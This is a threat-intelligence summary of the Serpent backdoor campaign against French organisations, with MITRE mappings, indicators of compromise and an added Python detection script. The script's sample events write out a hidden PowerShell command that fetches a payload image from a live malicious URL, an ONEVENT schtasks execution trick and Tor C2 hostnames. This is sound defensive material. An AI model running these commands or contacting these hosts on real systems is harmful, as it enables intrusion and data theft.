Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain | Proofpoint US

Proofpoint details a targeted French campaign delivering a backdoor named Serpent through a macro-enabled Word document. PowerShell hidden in images via steganography installs Chocolatey and then Python, after which the Python backdoor runs. The operation uses Tor-based C2 reached through onion.pet gateways and a novel schtasks-based execution technique to enable remote control and data exfiltration; attribution has not been assigned.

Keypoints

  • Targeted attack against French entities in the construction, real estate, and government sectors.
  • Delivery via a macro-enabled Microsoft Word document masquerading as GDPR information (e.g., “Candidature – Jeanne Vrakele”).
  • The macro reaches out to image URLs containing base64-encoded PowerShell scripts hidden via steganography to download and install Chocolatey, then Python and dependencies.
  • Steganography is used to conceal both the initial PowerShell and subsequent Python payloads inside images hosted on a Jamaican credit union site.
  • The Serpent backdoor downloads commands from an onion-based order server, executes them, and reports results via Termbin to an onion-based answer server, using Tor for C2.
  • A novel detection-bypass technique uses schtasks.exe to create a scheduled task that runs a portable executable, aiming to run under a signed process lineage (taskhostsw.exe).
  • Proofpoint notes no attribution to a known actor and highlights advanced, targeted threat characteristics; Campaign Discovery (Camp Disco) is used to cluster threats.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The campaign uses a macro-enabled Word document purporting to contain GDPR information to lure victims. ‘The messages contain a macro-enabled Microsoft Word document masquerading as information relating to the “règlement général sur la protection des données (GDPR)”.’
  • [T1059.001] PowerShell – A base64-encoded PowerShell script hidden in an image via steganography downloads and installs Chocolatey and Python. ‘base64 encoded PowerShell script hidden in the image using steganography.’
  • [T1027.001] Steganography – Scripts are concealed inside images used in the macro and payload delivery. ‘hidden in the image using steganography.’
  • [T1105] Ingress Tool Transfer – The script downloads and installs the Chocolatey installer and repository script, then installs Python and dependencies. ‘downloads, installs, and updates the Chocolatey installer package and repository script.’
  • [T1059.003] Windows Command Shell – A .bat file is created and executed to run the Python script. ‘creates and executes a .bat file that in turn executes the Python script.’
  • [T1071.001] Web Protocols – The backdoor communicates via HTTP/Internet-based C2 using order and answer servers with onion URLs. ‘The Serpent backdoor periodically pings the “order” server … and expects responses … The malware then uses PySocks to connect to the command line pastebin tool Termbin … sends a request to the “answer” server …’
  • [T1090] Proxy – The malware uses Tor-based proxy infrastructure for C2 communications. ‘a Tor proxy for command and control (C2) infrastructure.’
  • [T1053.005] Scheduled Task – The campaign showcases a novel use of schtasks.exe to create and delete a scheduled task, facilitating execution of a portable executable. ‘schtasks.exe /CREATE /SC ONEVENT …’
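The three observable stages in the techniques above (an Office process spawning PowerShell that fetches an image, schtasks.exe creating an ONEVENT task that runs an executable and then deleting it, and traffic to an .onion.pet Tor gateway) can be expressed as endpoint detection logic. The Python below is an added example written for this summary, not code from Proofpoint; it runs over constructed Sysmon-style process and proxy events. The event field names, host names, the task name "Updater" and the local file paths are assumptions; the fhccu.com image URL and the onion.pet hostname are the indicators listed on this page.

```python
"""Added example (not from the Proofpoint post): flag the three stages of the
Serpent chain in constructed process-creation and proxy events."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
IMAGE_URL_RE = re.compile(r"https?://[^\s'\"]+\.(?:jpe?g|png|gif)\b", re.I)
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)
# onion.pet is the Tor gateway named in the post; onion labels are base32 (a-z, 2-7).
ONION_GATEWAY_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\.pet\b", re.I)
TASK_NAME_RE = re.compile(r'/tn\s+"?([^"\s]+)"?', re.I)
TASK_RUN_RE = re.compile(r'/tr\s+"?([^"]+?\.exe)\b', re.I)


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return a list of findings; each names the MITRE technique it matched."""
    findings = []
    created = {}  # (host, task name) -> index of the /CREATE finding, enriched on /DELETE
    for ev in events:
        host = ev.get("host", "?")
        if ev.get("type") == "process":
            image = _basename(ev.get("image", ""))
            parent = _basename(ev.get("parent_image", ""))
            cmd = ev.get("cmdline", "")
            # Stage 1: Office-spawned PowerShell fetching an image (stego carrier).
            if image in {"powershell.exe", "pwsh.exe"} and parent in OFFICE_PARENTS:
                url = IMAGE_URL_RE.search(cmd)
                if url and DOWNLOAD_RE.search(cmd):
                    findings.append({"technique": "T1059.001", "host": host,
                                     "detail": f"{parent} spawned PowerShell fetching {url.group(0)}"})
            # Stage 2: event-triggered scheduled task that runs an executable, later removed.
            elif image == "schtasks.exe":
                low = cmd.lower()
                name = TASK_NAME_RE.search(cmd)
                if "/create" in low and "/sc onevent" in low:
                    run = TASK_RUN_RE.search(cmd)
                    if run and name:
                        findings.append({"technique": "T1053.005", "host": host,
                                         "task": name.group(1), "deleted": False,
                                         "detail": f"ONEVENT task runs {run.group(1)}"})
                        created[(host, name.group(1).lower())] = len(findings) - 1
                elif "/delete" in low and name:
                    idx = created.get((host, name.group(1).lower()))
                    if idx is not None:
                        findings[idx]["deleted"] = True
        # Stage 3: outbound connection to a Tor gateway hostname.
        elif ev.get("type") == "network":
            dest = ev.get("dest_host", "")
            if ONION_GATEWAY_RE.search(dest):
                findings.append({"technique": "T1090", "host": host,
                                 "detail": f"{_basename(ev.get('image', ''))} -> {dest}"})
    return findings


# Constructed events in the shape an EDR/Sysmon export might have (not real telemetry).
# The page lists the fhccu.com URL defanged; it is written plainly here so the regex sees it.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\jdoe\Downloads\Candidature.docm"'},
    {"type": "process", "host": "ws01",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c Invoke-WebRequest -Uri "
                "https://www.fhccu.com/images/ship3.jpg -OutFile $env:TEMP\\ship3.jpg"},
    # Benign: interactive PowerShell with no Office parent.
    {"type": "process", "host": "ws02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"type": "process", "host": "ws01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /CREATE /SC ONEVENT /EC Application /MO "*[System/EventID=9999]" '
                r'/TN "Updater" /TR "C:\Users\jdoe\AppData\Local\Temp\updater.exe" /F'},
    {"type": "process", "host": "ws01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /DELETE /TN "Updater" /F'},
    # Benign: a routine daily task.
    {"type": "process", "host": "ws02", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /CREATE /SC DAILY /TN "Backup" /TR "C:\Tools\backup.exe"'},
    {"type": "network", "host": "ws01", "image": r"C:\Python310\python.exe",
     "dest_host": "mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd.onion.pet",
     "dest_port": 443},
    {"type": "network", "host": "ws02", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "www.example.com", "dest_port": 443},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

Running the block prints three findings, all on ws01: the Office-spawned PowerShell image fetch, the ONEVENT task (marked as deleted once the matching /DELETE is seen on the same host) and the python.exe connection to the onion.pet gateway; the interactive PowerShell, the DAILY task and the browser traffic on ws02 produce nothing. Correlating the /CREATE and /DELETE by host and task name is what separates the create-run-delete pattern the post describes from ordinary task management.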

Indicators of Compromise

  • [URL] Encoded Payload URL – https://www[.]fhccu[.]com/images/ship3[.]jpg, https://www[.]fhccu[.]com/images/7[.]jpg
  • [Domain] C2 – mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd.onion.pet/index.html, ggfwk7yj5hus3ujdls5bjza4apkpfw5bjqbq4j6rixlogylr5x67dmid.onion.pet/index.html
  • [Domain] ShortURL – shorturl.at/qzES8
  • [Email Address] Sender emails – jeanne.vrakele@gmail[.]com, jean.dupontel@protonmail[.]com, no-reply@dgfip-nanterre[.]com
  • [SHA256] Docm SHA256 – f988e252551fe83b5fc3749e1d844c31fad60be0c25e546c80dbb9923e03eaf2, ec8c8c44eae3360be03e88a4bc7bb03f3de8d0a298bff7250941776fcea9faab, 8912f7255b8f091e90083e584709cf0c69a9b55e09587f5927c9ac39447d6a19
  • [File Name] – ship.jpg, ship3.jpg, 7.jpg (images used for steganography payload delivery)

Read more: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain